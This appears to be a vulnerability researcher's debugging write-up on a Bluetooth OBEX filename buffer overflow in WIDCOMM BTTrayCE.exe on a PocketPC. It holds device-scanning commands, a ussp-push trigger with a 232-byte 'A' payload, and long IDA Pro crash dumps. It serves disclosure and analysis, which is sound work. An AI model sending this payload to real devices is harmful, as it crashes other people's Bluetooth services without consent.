Get documents about "txt
Document Sample
BTTrayCE.exe normally runs from \Windows\Startup on my PocketPC (ipaq 2215) device. I am currently running version WIDCOMM BTW-CE 1.4.1 Build60 In order to debug this issue you must first remove this file from the startup folder and Soft boot the ipaq. Open Up IDA Pro Advanced 4.9 32 bit and choose Debugger -> Run -> Remote WinCE debugger. When the box comes up an asks for the path to the file type in "\Windows\BTTrayCE.exe" and press OK. You need to trigger the overflow from a remote machine with bluetooth enabled. kfinisterre@animosity:~/ussp-push-0.4$ hcitool scan Scanning ... 00:04:3E:65:A1:C8 Pocket_PC kfinisterre@animosity:~/ussp-push-0.4$ sdptool browse 00:04:3E:65:A1:C8 Browsing 00:04:3E:65:A1:C8 ... ... Service Name: OBEX Object Push Service RecHandle: 0x10001 Service Class ID List: "OBEX Object Push" (0x1105) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 2 "OBEX" (0x0008) Language Base Attr List: code_ISO639: 0x656e encoding: 0x6a base_offset: 0x100 Profile Descriptor List: "OBEX Object Push" (0x1105) Version: 0x0100 ... The following ussp-push command should trigger the overflow. animosity:/home/kfinisterre/ussp-push-0.4# ./ussp-push 00:04:3E:65:A1:C8@2 /etc/hosts `perl -e 'print "A" x 232'` pushing file /etc/hosts name=/etc/hosts, size=257 Registered transport set user data created new objext Local device 00:20:E0:4C:CF:DF Remote device 00:04:3E:65:A1:C8 (2) started a new request reqdone Command (00) has now finished, rsp: 20Connected! Connection return code: 0, id: 0 Connection established connected to server Sending file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA, path: /etc/hosts, size: 257 reqdone When the program crashes this is where we are. coredll.dll:01F83AA0 loc_1F83AA0 coredll.dll:01F83AA8 j coredll.dll:01F83AA0 LDR R0, [R1,R0]! coredll.dll:01F83AA4 $r0 is 41414141 $r1 is 240555A8 debug837:240555A8 This is exactly AT $r1... debug837:240555A8 debug837:240555A9 debug837:240555AA debug837:240555AB debug837:240555AC debug837:240555AD debug837:240555AE debug837:240555AF debug837:240555B0 debug837:240555B1 debug837:240555B2 debug837:240555B3 debug837:240555B4 debug837:240555B5 debug837:240555B6 debug837:240555B7 debug837:240555B8 debug837:240555B9 debug837:240555BA debug837:240555BB debug837:240555BC debug837:240555BD debug837:240555BE debug837:240555BF debug837:240555C0 debug837:240555C1 debug837:240555C2 DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; A A A A A A A A A A A A A A A A A A A A A A A A A A A ; CODE XREF: debug837:240555C3 debug837:240555C4 debug837:240555C5 debug837:240555C6 debug837:240555C7 debug837:240555C8 debug837:240555C9 debug837:240555CA debug837:240555CB debug837:240555CC debug837:240555CD debug837:240555CE debug837:240555CF debug837:240555D0 debug837:240555D1 debug837:240555D2 debug837:240555D3 debug837:240555D4 debug837:240555D5 debug837:240555D6 debug837:240555D7 debug837:240555D8 debug837:240555D9 debug837:240555DA debug837:240555DB debug837:240555DC debug837:240555DD debug837:240555DE debug837:240555DF debug837:240555E0 debug837:240555E1 debug837:240555E2 debug837:240555E3 debug837:240555E4 debug837:240555E5 debug837:240555E6 debug837:240555E7 debug837:240555E8 debug837:240555E9 debug837:240555EA debug837:240555EB debug837:240555EC debug837:240555ED debug837:240555EE debug837:240555EF debug837:240555F0 debug837:240555F1 DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x53 0 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A S This is the data before $r1 debug837:240554FC debug837:240554FD debug837:240554FE debug837:240554FF DCB 0x5C ; \ DCB 0 DCB 0x54 ; T DCB 0 debug837:24055500 debug837:24055501 debug837:24055502 debug837:24055503 debug837:24055504 debug837:24055505 debug837:24055506 debug837:24055507 debug837:24055508 debug837:24055509 debug837:2405550A debug837:2405550B debug837:2405550C debug837:2405550D debug837:2405550E debug837:2405550F debug837:24055510 debug837:24055511 debug837:24055512 debug837:24055513 debug837:24055514 debug837:24055515 debug837:24055516 debug837:24055517 debug837:24055518 debug837:24055519 debug837:2405551A debug837:2405551B debug837:2405551C debug837:2405551D debug837:2405551E debug837:2405551F debug837:24055520 debug837:24055521 debug837:24055522 debug837:24055523 debug837:24055524 debug837:24055525 debug837:24055526 debug837:24055527 debug837:24055528 debug837:24055529 debug837:2405552A debug837:2405552B debug837:2405552C debug837:2405552D debug837:2405552E debug837:2405552F debug837:24055530 debug837:24055531 debug837:24055532 debug837:24055533 debug837:24055534 debug837:24055535 DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB 0x65 0 0x6D 0 0x70 0 0x5C 0 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ; e ; m ; p ; \ ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A debug837:24055536 debug837:24055537 debug837:24055538 debug837:24055539 debug837:2405553A debug837:2405553B debug837:2405553C debug837:2405553D debug837:2405553E debug837:2405553F debug837:24055540 debug837:24055541 debug837:24055542 debug837:24055543 debug837:24055544 debug837:24055545 debug837:24055546 debug837:24055547 debug837:24055548 debug837:24055549 debug837:2405554A debug837:2405554B debug837:2405554C debug837:2405554D debug837:2405554E debug837:2405554F debug837:24055550 debug837:24055551 debug837:24055552 debug837:24055553 debug837:24055554 debug837:24055555 debug837:24055556 debug837:24055557 debug837:24055558 debug837:24055559 debug837:2405555A debug837:2405555B debug837:2405555C debug837:2405555D debug837:2405555E debug837:2405555F debug837:24055560 debug837:24055561 debug837:24055562 debug837:24055563 debug837:24055564 debug837:24055565 debug837:24055566 debug837:24055567 debug837:24055568 debug837:24055569 debug837:2405556A debug837:2405556B DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A debug837:2405556C debug837:2405556D debug837:2405556E debug837:2405556F debug837:24055570 debug837:24055571 debug837:24055572 debug837:24055573 debug837:24055574 debug837:24055575 debug837:24055576 debug837:24055577 debug837:24055578 debug837:24055579 debug837:2405557A debug837:2405557B debug837:2405557C debug837:2405557D debug837:2405557E debug837:2405557F debug837:24055580 debug837:24055581 debug837:24055582 debug837:24055583 debug837:24055584 debug837:24055585 debug837:24055586 debug837:24055587 debug837:24055588 debug837:24055589 debug837:2405558A debug837:2405558B debug837:2405558C debug837:2405558D debug837:2405558E debug837:2405558F debug837:24055590 debug837:24055591 debug837:24055592 debug837:24055593 debug837:24055594 debug837:24055595 debug837:24055596 debug837:24055597 debug837:24055598 debug837:24055599 debug837:2405559A debug837:2405559B debug837:2405559C debug837:2405559D debug837:2405559E debug837:2405559F debug837:240555A0 debug837:240555A1 DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB DCB 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A debug837:240555A2 debug837:240555A3 debug837:240555A4 debug837:240555A5 debug837:240555A6 debug837:240555A7 DCB DCB DCB DCB DCB DCB 0x41 0x41 0x41 0x41 0x41 0x41 ; ; ; ; ; ; A A A A A A bytes pages size description --------- ----- ---- -------------------------------------------262144 32 8192 allocating memory for b-tree... 65536 8 8192 allocating memory for virtual array... 262144 32 8192 allocating memory for name pointers... ----------------------------------------------------------------589824 total memory allocated Loading IDP module C:\Program Files\IDA\procs\pc.w32 for processor metapc...OK Autoanalysis subsystem has been initialized. Unloading IDP module C:\Program Files\IDA\procs\pc.w32... Loading IDP module C:\Program Files\IDA\procs\arm.w32 for processor arm...OK Connection to the Windows CE device has been established. Debugger: Process started: \Windows\BTTrayCE.exe Possible file format: PE executable (C:\Program Files\IDA\loaders\dbg.ldw) Possible file format: MS-DOS executable (EXE) (C:\Program Files\IDA\loaders\dos.ldw) Possible file format: Portable executable for ARM (PE) (C:\Program Files\IDA\loaders\pe.ldw) Loading file '\Windows\BTTrayCE.exe' into database... Detected file format: Portable executable for ARM (PE) 1015. Creating a new segment (00011000-00026A00) ... ... OK 1016. Creating a new segment (00027000-00029A00) ... ... OK 1017. Creating a new segment (0002A000-00033600) ... ... OK 1018. Creating a new segment (00034000-00035600) ... ... OK 1019. Creating a new segment (00036000-00037400) ... ... OK Reading exports directory... Reading imports directory... 1020. Creating a new segment (0002A4F8-00033600) ... ... OK Assuming __cdecl calling convention by default Flushing buffers, please wait...ok File '\Windows\BTTrayCE.exe' is successfully loaded into the database. Compiling file 'C:\Program Files\IDA\idc\ida.idc'... Executing function 'main'... Compiling file 'C:\Program Files\IDA\idc\onload.idc'... Executing function 'OnLoad'... IDA is analysing the input file... You may start to explore the input file right now. Debugger: Library loaded: \Windows\olece300.dll Debugger: Library loaded: \Windows\doclist.dll Debugger: Library loaded: \Windows\mfcce300.dll Debugger: Library loaded: \Windows\BTChooserLib.dll Debugger: Library loaded: \Windows\wbtapiCE.dll Debugger: Library loaded: \Windows\note_prj.dll Debugger: Library loaded: \Windows\toolhelp.dll Debugger: Library loaded: \Windows\ceshell.dll Debugger: Library loaded: \Windows\shutil.dll Debugger: Library loaded: \Windows\tshres.dll Debugger: Library loaded: \Windows\commctrl.dll Debugger: Library loaded: \Windows\oleaut32.dll Debugger: Library loaded: \Windows\ossvcs.dll Debugger: Library loaded: \Windows\aygshell.dll Debugger: Library loaded: \Windows\ole32.dll Debugger: Library loaded: \Windows\coredll.dll The initial autoanalysis has been finished. Debugger: Thread started: id=334B0892, entry=00022360. Debugger: Library loaded: \Windows\btrez.dll Debugger: Thread started: id=B329EFDA, entry=01744594. Debugger: Library loaded: \Windows\richink.dll Debugger: Library loaded: \Windows\ws2.dll Debugger: Library loaded: \Windows\winsock.dll Debugger: Library loaded: \Windows\chngtrk.dll Debugger: Library loaded: \Windows\outres.dll Debugger: Library loaded: \Windows\cemapi.dll Debugger: Library loaded: \Windows\BTCeOsif4.dll Debugger: Library loaded: \Windows\pimutil.dll Debugger: Library loaded: \Windows\calstore.dll Debugger: Library loaded: \Windows\pimstore.dll Debugged application message: Data Abort: Thread=935f0400 Proc=900d84b8 'BTTrayCE.exe'. Debugged application message: AKY=00020001 PC=01f83aa0 RA=01f839dc BVA=684a991c FSR=000000f5. BTTrayCE.exe: The instruction at 0x1F83AA0 referenced memory at 0x684A991C. The memory could not be read (0x01F83AA0 -> 684A991C)
